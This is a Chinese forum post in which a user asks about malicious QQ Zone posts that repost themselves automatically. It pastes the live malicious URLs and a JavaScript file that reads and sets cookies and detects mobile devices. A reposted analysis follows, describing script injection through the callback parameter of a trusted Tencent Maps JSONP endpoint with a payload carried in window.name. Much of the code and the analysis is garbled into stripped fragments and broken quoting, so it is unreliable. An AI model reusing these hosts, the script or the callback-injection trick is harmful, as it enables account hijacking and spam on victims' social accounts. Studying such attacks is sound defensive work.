問題估計不用過多描述了吧
朋友轉發的已經刪掉了 自己轉發的還留著貼上網址 非大神慎點http://kriqj.ysroxwh.gwau.pw/view/3/?id=2,0.1076497以及 求解決方法!
貼上這個網站源代碼中的一個.js 其中看到了cookie以及 ios android的字樣 是用來盜取cookie的嗎?
http://www.baidu.com.glzhd.com:9781/b/c.js
var s_reffer;try{s_reffer=window.top.document.referrer;}catch(e){s_reffer=document.referrer;}
s_reffer = escape(s_reffer);
function get_c_b(Name)
{ var search = Name + "=" ;var returnvalue = ""; if (document.cookie.length &> 0) { offset = document.cookie.indexOf(search);if (offset != -1) {offset += search.length ;end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length;returnvalue=unescape(document.cookie.substring(offset, end)) ;} } return returnvalue; }
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
ios: !!u.match(/(i[^;]+;( U;)? CPU.+Mac OS X/),
android: u.indexOf("Android") &> -1 || u.indexOf("Linux") &> -1,
iPhone: u.indexOf("iPhone") &> -1,
iPad: u.indexOf("iPad") &> -1
}}()
}
var khdlx=0;
if (browser.versions.iPhone || browser.versions.iPad || browser.versions.ios) {khdlx=2}else{
if(browser.versions.android){khdlx=1}
}//if(sd_i==43){khdlx=2;}
var pWG_=pWG_+1||1;
if(pWG_==1){if(get_c_b("C_P_i")==""){var Bi=1;var Bv=1;expires = new Date();
expires.setTime(expires.getTime()+600*60*1000) ;
document.cookie = "C_P_i="1";expires="+expires.toGMTString() + "; path=/;domain="+location.hostname+"";}else{var Bi=0;var Bv=1;}
}
else{var Bi=0;var Bv=0;}
var mw = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
var mh = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight;
if(mw&>mh){mh2=mh;mh=mw;mw=mh2;}
//if(mw&>580){mw=580}
mh=parseInt(3*mw/20);
document.write ("&");
/*mb*/
function mbwh(){var w = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
var h = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight;
//if(w&>580){w=580}
if(document.getElementById("biGi")){mbwh3(w);}else{setTimeout(mbwh,1000);}
}
function mbwh2(){mbwh();
var evt = "onorientationchange" in window ? "orientationchange" : "resize";
window.addEventListener(evt,function(obj){
setTimeout(mbwh,500);
})
}
function mbwh3(w){
biGii=document.getElementById("biGi");
biGiihe=parseInt(3*w/20);
if(document.getElementById("spbd")){document.getElementById("spbd").style.paddingTop=40+"px";}
}
搬運自關於惡意說說自動在QQ空間轉發的機制
有些很討厭的帶鏈接說說,只要你在手機打開它,就會自動轉發,內容極其不雅
一怒之下我決定看個究竟
首先,在此頁開頭有此關鍵語句:1
2
34&
&
窗口名name是一段腳本
首先,瀏覽器會載入http://rtb.map.qq.com/rtbus?qt=compscb=
http://rtb.map.qq.com/rtbus?qt=compscb=#Your_Code_Here#
這是騰訊地圖的 RealTime Bidding(實時競價,RTB)API,會受到騰訊自己和殺軟的信任,它的作用是返回這樣的格式:
#Your_Code_Here# #Your_Code_Here#({「detail」:{「comp_list」:[{「city」:3,」comp_id」:1,」name」:」騰訊北分」}],」num」:1},」info」:{「error」:0,」type」:86}})
騰訊北分,真是233到不行。看來北分在積极參与啊!
於是&
1&&